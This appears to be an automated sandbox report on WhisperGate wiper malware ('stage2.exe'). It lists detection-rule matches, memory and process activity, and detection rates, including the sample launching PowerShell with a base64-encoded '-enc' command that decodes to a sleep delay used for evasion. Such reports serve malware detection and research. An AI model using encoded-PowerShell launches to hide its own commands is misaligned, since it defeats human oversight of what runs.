    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: Process Memory Space: powershell.exe PID: 7160, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: Process Memory Space: powershell.exe PID: 7140, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04A6CB102_2_04A6CB10
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E757682_2_07E75768
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E767282_2_07E76728
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E783202_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E783102_2_07E78310
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E790582_2_07E79058
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E71B882_2_07E71B88
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E783202_2_07E78320
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E798202_2_07E79820
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07EA7E002_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07EA7E002_2_07EA7E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E71B782_2_07E71B78
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3DFA813_2_07A3DFA8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3F27813_2_07A3F278
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3004013_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3EF2013_2_07A3EF20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A341F013_2_07A341F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3004013_2_07A30040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A67E0013_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A67E0013_2_07A67E00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D8C2813_2_080D8C28
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D8C1813_2_080D8C18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080DA6B813_2_080DA6B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080DA6B213_2_080DA6B2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07A3A16F13_2_07A3A16F
    Source: stage2.exe, 00000001.00000000.439903603.0000000000EA8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exe, 00000001.00000002.480852082.000000000161A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exe, 00000001.00000000.438479767.000000000161A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs stage2.exe
    Source: stage2.exeBinary or memory string: OriginalFilenameTbopbh.exer) vs stage2.exe
    Source: stage2.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: stage2.exeStatic PE information: invalid certificate
    Source: stage2.exeVirustotal: Detection: 44%
    Source: stage2.exeReversingLabs: Detection: 48%
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Users\user\Desktop\stage2.exeJump to behavior
    Source: stage2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\stage2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\stage2.exe "C:\Users\user\Desktop\stage2.exe"
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==Jump to behavior
    Source: C:\Users\user\Desktop\stage2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==Jump to behavior
    Source: C:\Users\user\Desktop\stage2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220117Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1Jump to behavior
    Source: classification engineClassification label: mal72.troj.evad.winEXE@8/14@1/2
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7084
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected